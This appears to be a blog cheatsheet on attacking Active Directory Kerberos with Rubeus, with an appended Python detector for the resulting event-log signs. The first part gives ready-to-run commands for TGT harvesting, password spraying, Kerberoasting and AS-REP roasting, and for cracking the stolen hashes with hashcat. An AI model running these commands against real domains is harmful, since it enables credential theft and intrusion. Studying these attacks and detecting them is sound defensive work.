Using Rubeus to abuse Kerberos in Active Directory

Author: Jonathan Devere-Ellery

Rubeus is a great tool that allows us to interact with Kerberos. I recently went through an offensive campaign in my lab using BloodHound, and this is intended as a quick cheatsheet.

Basics

Harvest TGT

Harvest all TGTs every X seconds

.\rubeus.exe harvest /interval:30

Password Spraying

Bruteforcing/spraying one password across multiple user accounts

.\rubeus.exe brute /password:Password1 /noticket

Combining with hashcat

Hashcat can attempt to crack the extracted hashes and recover the cleartext passwords. The example hashes page on the Hashcat wiki lists each hash type together with the hash mode that has to be passed to hashcat.exe with the -m flag. The commands below use the rockyou wordlist, downloaded into hashcat's dict directory:

Invoke-WebRequest "https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt" -OutFile "C:\hashcat\dict\rockyou.txt"

Kerberoasting and Hashcat

Bruteforcing the RC4 TGS-REP hashes of service accounts that have an SPN

.\rubeus.exe kerberoast
.\rubeus.exe kerberoast /outfile:C:\tools\hashcat\hashes\TGS-REP_hash.txt

.\hashcat.exe -m 13100 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"
.\hashcat.exe -D 1 -m 13100 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"

AS-REP Roast and Hashcat

Bruteforcing AS-REP hashes for user/service accounts that have Kerberos preauthentication turned off, which is why you should never select the 'Do not require Kerberos preauthentication' option in AD: the AS-REP for such an account can be requested without knowing its password and cracked offline.

.\rubeus.exe asreproast
.\rubeus.exe asreproast /outfile:C:\tools\hashcat\hashes\AS-REP_hash.txt

.\hashcat.exe -m 18200 "hashes/AS-REP_hash.txt" "dict/rockyou.txt"
.\hashcat.exe -D 1 -m 18200 "hashes/AS-REP_hash.txt" "dict/rockyou.txt"
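A defender-side companion to the two roasting sections above, added here and not part of the original post: it scans parsed Security events for the two artefacts these attacks leave on the domain controller, a burst of RC4 (0x17) service-ticket requests from one client (Kerberoasting, event 4769) and successful TGT requests with Pre-Authentication Type 0 (AS-REP roasting, event 4768). Field names follow the Windows Security log XML; the sample events, source IPs and the threshold are constructed assumptions.

```python
"""Flag Kerberoasting and AS-REP roasting indicators in Windows Security events."""

# Constructed sample events, already parsed into dicts; field names follow the
# EventData names of Event ID 4769 (TGS request) and 4768 (TGT request).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc_sql", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "svc_web", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "svc_backup", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice", "ServiceName": "cifs/fs01",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.40", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.41", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "legacy_app", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # etype 23, the TGS-REP hash type cracked with hashcat mode 13100


def rc4_tgs_requests_per_source(events, threshold=3):
    """Kerberoasting indicator: one client requesting RC4 service tickets for
    several distinct SPNs. Returns {client_ip: [service names]} for every
    client at or above the threshold (threshold is an assumed tuning value)."""
    by_source = {}
    for e in events:
        if e["EventID"] == 4769 and e["TicketEncryptionType"].lower() == RC4_HMAC:
            by_source.setdefault(e["IpAddress"], []).append(e["ServiceName"])
    return {ip: svcs for ip, svcs in by_source.items() if len(set(svcs)) >= threshold}


def asrep_without_preauth(events):
    """AS-REP roasting indicator: a successful TGT request (4768, Status 0x0)
    with Pre-Authentication Type 0, meaning the account has the
    'Do not require Kerberos preauthentication' flag set."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"
                   and e["Status"] == "0x0"})


if __name__ == "__main__":
    print("Possible Kerberoasting:", rc4_tgs_requests_per_source(SAMPLE_EVENTS))
    print("Accounts roastable via AS-REP:", asrep_without_preauth(SAMPLE_EVENTS))
```

Accounts returned by the second check are the ones whose 'Do not require Kerberos preauthentication' flag should be cleared; RC4 bursts from one client are worth correlating with the source host before acting, since legacy systems can legitimately request RC4 tickets.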